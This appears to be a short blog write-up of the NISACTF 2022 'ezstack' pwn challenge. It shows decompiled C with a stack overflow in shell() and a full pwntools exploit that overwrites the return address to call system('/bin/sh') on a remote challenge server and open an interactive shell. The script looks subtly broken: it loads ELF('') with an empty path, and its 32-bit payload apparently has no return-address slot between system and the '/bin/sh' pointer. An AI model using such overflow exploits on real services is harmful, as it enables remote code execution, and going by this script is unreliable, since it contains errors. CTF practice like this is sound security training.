NISACTF 2022 ezstack

[NISACTF2022]ezstack

  • main
int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  shell();
  return 0;
}
  • shell
ssize_t shell()
{
  char buf; // [esp+0h] [ebp-48h]

  system("echo Welcome to NISACTF");
  return read(0, &buf, 0x60u);
}

shell函数处有溢出

完整exp

from pwn import *
elf = ELF('')
# io = process('')
io = remote('124.221.24.137',28760)
padlength = 0x48 + 0x4
bin_sh = next(elf.search(b'/bin/sh'))
system = elf.sym['system']
success('[+]bin_sh=' + hex(bin_sh)) 
success('[+]system=' + hex(system))
shell = elf.sym['shell']
success('[+]shell=' + hex(shell))
payload = b'a' * padlength + p32(system) + p32(bin_sh)
io.sendline(payload)
io.interactive()
posted @ 2022-05-10 22:31  dotExp  阅读(375)  评论(0编辑  收藏  举报